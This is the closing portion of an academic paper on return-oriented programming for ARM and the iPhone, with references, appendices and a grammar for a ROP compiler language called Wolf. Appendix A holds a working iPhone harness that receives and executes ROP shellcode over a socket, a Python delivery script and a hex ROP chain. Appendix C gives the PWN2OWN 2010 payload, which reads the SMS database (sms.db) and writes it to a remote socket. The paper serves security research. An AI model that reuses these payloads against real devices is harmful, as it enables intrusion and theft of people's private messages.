[9] Tim Kornau. Return oriented programming for the ARM architecture. http://www.zynamics.com/static_html/downloads/kornau-tim--diplomarbeit--rop.pdf, 2009.

[10] Sebastian Krahmer. x86-64 buffer overflow exploits and the borrowed code chunks exploitation technique. http://www.suse.de/~krahmer/no-nx.pdf, September 2005.


[11] Farhad Mavaddat and Behrooz Parhami. URISC: The ultimate reduced instruction set computer. Research Report 36, University of Waterloo, June 1987. Research Report CS-87-36.

[12] Ryan Roemer. Finding the bad in good code: Automated return-oriented programming exploit discovery. M.s. thesis, University of California, San Diego, 2009.

[13] Ryan Roemer, Erik Buchanan, Hovav Shacham, and Stefan Savage. Return-oriented programming: Systems, languages, and applications. Manuscript, 2009.

[14] Hovav Shacham. The geometry of innocent flesh on the bone: return-into-libc without function calls (on the x86). In Peng Ning, Sabrina De Capitani di Vimercati, and Paul F. Syverson, editors, ACM CCS 2007, pages 552–561. ACM, 2007.

[15] The PaX team. Documentation for the PaX project: Address Space Layout Randomization design & implementation. http://pax.grsecurity.net/docs/aslr.txt, April 2003.

[16] The PaX team. Documentation for the PaX project: Non-executable pages design & implementation. http://pax.grsecurity.net/docs/noexec.txt, May 2003.

[17] Wikipedia. Depth-limited search - Wikipedia, the free encyclopedia, 2010.

A iPhone exploit payload tester source

The following code (Listing 1) can be used to test return-oriented programming shellcode on an iPhone. For each shellcode which one wants to test, some of the code must be changed. This change is necessary to gain access to the desired functions and because the length of the chained gadgets and the gadgets themselves might vary.

    #import <UIKit/UIKit.h>
    #import <AudioToolbox/AudioServices.h>

    #include <stdio.h>
    #include <stdlib.h>
    #include <strings.h>
    #include <err.h>
    #include <pthread.h>
    #include <sys/socket.h>
    #include <sys/syscall.h>
    #include <sys/unistd.h>
    #include <netinet/in.h>
    #include <mach/mach.h>

    unsigned long stack_pointer = 0, eip = 0;

    void restoreStack()
    {
        __asm__ __volatile__(
            "mov sp, %0\t\n"
            "mov pc, %1"
            :
            :"r"(stack_pointer), "r"(eip + 0x14)
        );
        // WARNING: if any code is added to read_and_exec
        // the 'eip + 0x14' has to be recalculated
    }

    int read_and_exec(int s)
    {
        int n, length;
        unsigned int restoreStackAddr = (unsigned int)&restoreStack;

        fprintf(stderr, "Reading length... ");
        if ((n = recv(s, &length, sizeof(length), 0)) != sizeof(length))
        {
            if (n < 0)
            {
                perror("recv");
            }
            else
            {
                fprintf(stderr, "recv: short read\n");
                return -1;
            }
        }
        fprintf(stderr, "%d\n", length);
        void *payload = malloc(length + 1);
        if (payload == NULL)
        {
            perror("Unable to allocate the buffer\n");
        }
        fprintf(stderr, "Sending address of restoreStack function\n");

        if (send(s, &restoreStackAddr, sizeof(unsigned int), 0) == -1)
        {
            perror("Unable to send the restoreStack function address");
        }

        fprintf(stderr, "Reading payload... ");
        if ((n = recv(s, payload, length, 0)) != length)
        {
            if (n < 0)
            {
                perror("recv");
            }
            else
            {
                fprintf(stderr, "recv: short read\n");
                return -1;
            }
        }

        // save the current pc and sp so that restoreStack can return here
        __asm__ __volatile__ (
            "mov %1, pc\n\t"
            "mov %0, sp\n\t"
            :"=r"(stack_pointer), "=r"(eip)
        );
        // point sp at the payload and start executing it
        __asm__ __volatile__ (
            "mov sp, %0\n\t"
            "pop {r0, r1, r2, r3, r4, r5, r6, pc}"
            :
            :"r"(payload)
        );

        //the payload jumps back here
        stack_pointer = eip = 0;
        free(payload);

        return 0;
    }

    void startServer()
    {
        int c, s, val;
        struct sockaddr_in saddr, client_saddr;
        socklen_t salen = sizeof(client_saddr);
        short port = 1234;

        if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP)) < 0)
        {
            perror("socket");
            return;
        }

        val = 1;
        if (setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &val, sizeof(val)) < 0)
        {
            perror("setsockopt");
            return;
        }

        bzero(&saddr, sizeof(saddr));
        saddr.sin_family = AF_INET;
        saddr.sin_port = htons(port);
        saddr.sin_addr.s_addr = INADDR_ANY;

        if (bind(s, (struct sockaddr*)&saddr, sizeof(saddr)) < 0)
        {
            perror("bind");
            return;
        }

        if (listen(s, 5) < 0)
        {
            perror("listen");
            return;
        }

        while(1)
        {
            if ((c = accept(s, (struct sockaddr*)&client_saddr, &salen)) < 0)
            {
                perror("accept");
                return;
            }
            read_and_exec(c);
        }
    }

    int main(int argc, char *argv[])
    {
        NSAutoreleasePool * pool = [[NSAutoreleasePool alloc] init];
        //the "sound system" has to be initialized before using it in the payload
        AudioServicesPlaySystemSound(0xfff);
        startServer();
        int retVal = UIApplicationMain(argc, argv, nil, nil);
        [pool release];
        return retVal;
    }

Listing 1: iPhone payload test application

To send a payload to the test program a simple Python script (Listing 2) can be used. An example for such a Python script is presented below.

    import os
    import sys
    import socket
    import struct
    import binascii

    # read the hex-encoded payload and convert it to raw bytes
    with open(sys.argv[1], 'rb') as f:
        print("[+] Reading payload from file\n")
        payload = f.read()
    payload = payload.strip(b'\n')
    payload = binascii.unhexlify(payload)
    print("[+] Payload length is: ", len(payload))

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((sys.argv[2], int(sys.argv[3])))
    # the announced length includes the 4-byte address appended below
    s.send(struct.pack('i', len(payload) + 4))
    print("[+] Sending payload length\n")

    restoreFuncAddr = s.recv(4)
    restoreFuncAddr = struct.unpack('i', restoreFuncAddr)[0]
    print("[+] Restore function is at: ", hex(restoreFuncAddr))

    payload += struct.pack('i', restoreFuncAddr)
    s.send(payload)
    print("[+] Sending payload..\n")
    s.close()
    print("[+] Done")

Listing 2: Python payload deliver script

The return-oriented programming shellcode (Listing 3), which in this particular example is used to trigger a vibrate, is shown below.

    // garbage for registers r0-r6
    00000000000000000000000000000000000000000000000000000000
    # actual payload
    416a9832665534127386983244332211ff0f0000cd63b63000000000
    # EXPLANATION:
    # 0x32986a41; // PC
    # // 0x32986a40 0xe8bd4080 pop {r7, lr}
    # // 0x32986a44 0x0000b001 add sp, #4
    # // 0x32986a46 0x00004770 bx lr
    # 0x12345566; // r7
    # 0x32988673; // LR / PC
    # 0x11223344; // garbage value (skipped over with add sp)
    # // 0x32988672 0x0000bd01 pop {r0, pc}
    # 0x00000fff; // r0
    # 0x30b663cd; // PC
    # // 0x30b663cc <AudioServicesPlaySystemSound>
    # 0x00000000; // r0 (exit code)

Listing 3: Return-oriented shellcode example

To be able to use and adapt the shellcode for other possible targets, some points must be taken into consideration.

1. The payload currently misses the address of the “restoreStack” function in Listing 1; therefore, to use the example shellcode it is advised to use the Python script which handles this issue.


2. If you want to adapt the shellcode for your own purposes and therefore change the function which handles the payload, you need to alter the “eip” offset in the “restoreStack” function.

3. You have to make sure that there is a “free” space for a PC in the shellcode.

4. You need to fill the “initial space” as the payload is executed after this pop: “pop {r0, r1, r2, r3, r4, r5, r6, pc}”.

5. As the PC will be automatically filled with the correct address by the Python script, the last thing to pay attention to is the endianness of the shellcode.

B Description of the Wolf language in EBNF

    Statement          = AccessStmnt | ControlFlowStmnt |
                         Assignment | ReferenceStmnt |
                         LabelStmnt | ForwardRefStmnt |
                         DataStmnt;
    ControlFlowStmnt   = GotoStmnt | CallStmnt;
    Assignment         = SingleAssignment | MultiAssignment;
    AccessStmnt        = ProtectStmnt | AllowCorruptStmnt |
                         AllowReadStmnt;
    AllowCorruptStmnt  = "allowcorrupt" "(" list-of-memranges ")";
    AllowReadStmnt     = "allowread" "(" list-of-memranges ")";
    CallStmnt          = "call" "(" targetAddress ")";
    DataStmnt          = DataArrayStmnt | DataAsciiStmnt;
    DataArrayStmnt     = "data" "(" label "," DataType ","
                         length "," numbers-or-xxx ")";
    DataAsciiStmnt     = "data" "(" label "," "ascii" "," string ")";
    DataType           = "uint8" | "uint16" | "uint32";
    GotoStmnt          = "gotoifnz" "(" register "," label ")";
    LabelStmnt         = "label" "(" label ")";
    ProtectStmnt       = "protect" "(" list-of-registers ")";
    ForwardRefStmnt    = "forwardref" "(" label ")";
    AssignmentOperator = "<<_|";
    SingleAssignment   = target AssignmentOperator expression;
    MultiAssignment    = "(" target {"," target} ")"
                         AssignmentOperator
                         "(" expression {"," expression} ")";
    list-of-registers  = "[" register {"," register} "]";
    numbers-or-xxx     = list-of-numbers | "DONTCARE";
    list-of-numbers    = "[" number {"," number} "]";
    list-of-memranges  = "[" memrange {"," memrange} "]";
    memrange           = "(" number "," number ")";
    target             = register | number | memorylocation;
    memorylocation     = "mem" "[" memoryindex "]";
    memoryindex        = register | number | register "+" number |
                         register "-" number;
    oct_digit          = '0' | '1' | '2' | '3' |
                         '4' | '5' | '6' | '7';
    dec_digit          = oct_digit | '8' | '9';
    hex_digit          = dec_digit |
                         'a' | 'b' | 'c' | 'd' | 'e' | 'f' |
                         'A' | 'B' | 'C' | 'D' | 'E' | 'F';
    oct_number         = '0' oct_digit {oct_digit};
    dec_number         = dec_digit {dec_digit};
    hex_number         = "0x" hex_digit {hex_digit};
    number             = oct_number | dec_number | hex_number;

The constructs string, expression and register are not explicitly defined for brevity's sake. A string simply is an ASCII string; register is architecture-specific; expression is any valid formula involving only arithmetic and logical operators, with constants, registers and memory locations as operands.

C Example payload: The PWN2OWN 2010 iPhone payload in Wolf

    from wolf.iphone import *

    O_RDONLY = 0
    AF_INET = 2
    SOCK_STREAM = 1
    SIZEOF_SOCKADDR_IN = 16
    SIZEOF_STAT = 104
    PROT_READ = 1
    MAP_SHARED = 1
    ST_SIZE_OFFSET = 60
    # all of the values below are specific to iPhoneOS 3.1.3 on 3GS
    corruptstart = 0x6001000 # heap @ 0x6000000
    corruptend = 0x6100000
    readstart = 0x328C16A0 # libSystem start
    readend = 0x3852B513 # libSystem end

    allowcorrupt([corruptstart, corruptend])
    allowread([readstart, readend])

    # define forward references
    forwardref(filename)
    forwardref(sin)
    forwardref(sockloc)
    forwardref(fdloc)
    forwardref(statbuf)

    ### fd = open(filename, O_RDONLY);
    protect(r0, r1)
    (r0,r1) <<_| (filename, O_RDONLY)
    call(open)
    protect(r0)
    mem[fdloc] <<_| r0
    ### sock = socket(AF_INET, SOCK_STREAM, 0);
    protect(r0,r1,r2)
    (r0,r1,r2) <<_| (AF_INET, SOCK_STREAM, 0)
    call(socket)
    protect(r0)
    mem[sockloc] <<_| r0
    ### connect(sock, (struct sockaddr *) sin, sizeof(struct sockaddr_in));
    (r0,r1,r2) <<_| (mem[sockloc], sin, SIZEOF_SOCKADDR_IN)
    call(connect)
    ### stat(filename, &statbuf);
    protect(r0,r1)
    (r0,r1) <<_| (filename, statbuf)
    call(stat)
    ### map = mmap(0x0, statbuf.st_size, PROT_READ, MAP_SHARED, fd, 0);
    protect(none)
    (mem[sp], mem[sp+4]) <<_| (mem[fdloc], 0)
    protect(r0,r1,r2,r3)
    (r0,r1,r2,r3) <<_| (0, statbuf + ST_SIZE_OFFSET, PROT_READ, MAP_SHARED)
    call(mmap)
    ### write(sock, map, statbuf.st_size);
    protect(r0)
    r1 <<_| r0
    protect(r0,r1,r2)
    (r0,r2) <<_| (mem[sockloc], statbuf + ST_SIZE_OFFSET)
    call(write)
    ### /* UGLY, UGLY hack! sleep to prevent data truncation */
    ### sleep(16);
    protect(r0)
    r0 <<_| 16 # 16 seconds
    call(sleep)
    ### exit(0);
    protect(r0)
    r0 <<_| 0
    call(exit)

    data(filename, ascii, "/var/mobile/Library/SMS/sms.db")
    data(sin, uint8, SIZEOF_SOCKADDR_IN, [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0])
    data(sockloc, uint32, 1, DONTCARE)
    data(fdloc, uint32, 1, DONTCARE)
    data(statbuf, uint8, SIZEOF_STAT, DONTCARE)
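The access statements used in the payload (protect, allowcorrupt, allowread) restrict which side effects a chosen gadget may have. The following is a rough sketch of such a check and not the Wolf's implementation: the paper states that the real compiler hands symbolic constraints to the STP solver, whereas this sketch assumes the side effects are already known as concrete register names and addresses. The names GadgetEffects, in_ranges and side_effects_allowed are hypothetical, and the ranges are assumed to be inclusive.

```python
from dataclasses import dataclass, field


@dataclass
class GadgetEffects:
    """Hypothetical summary of one gadget's side effects."""
    clobbered: set = field(default_factory=set)  # registers overwritten
    writes: list = field(default_factory=list)   # concrete addresses written
    reads: list = field(default_factory=list)    # concrete addresses read


def in_ranges(addr, ranges):
    """Return True if addr lies inside any (start, end) range, ends included."""
    return any(start <= addr <= end for start, end in ranges)


def side_effects_allowed(effects, protected, corrupt_ranges, read_ranges):
    """Check a gadget's side effects against the access statements."""
    if effects.clobbered & set(protected):
        return False  # would overwrite a protected register
    if not all(in_ranges(a, corrupt_ranges) for a in effects.writes):
        return False  # writes outside the allowcorrupt regions
    # every read must fall inside an allowread region
    return all(in_ranges(a, read_ranges) for a in effects.reads)


# Ranges taken from the payload in Appendix C (iPhoneOS 3.1.3 on 3GS).
CORRUPT = [(0x6001000, 0x6100000)]
READ = [(0x328C16A0, 0x3852B513)]

if __name__ == "__main__":
    # Illustrative gadget: clobbers r4, writes to the heap, reads libSystem.
    harmless = GadgetEffects({"r4"}, [0x6001010], [0x32986A40])
    print(side_effects_allowed(harmless, {"r0", "r1"}, CORRUPT, READ))
```

A gadget that clobbers r0 while protect(r0, r1) is in force, or that writes outside the allowcorrupt range, would be rejected by this check, and the search would have to continue with another candidate.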
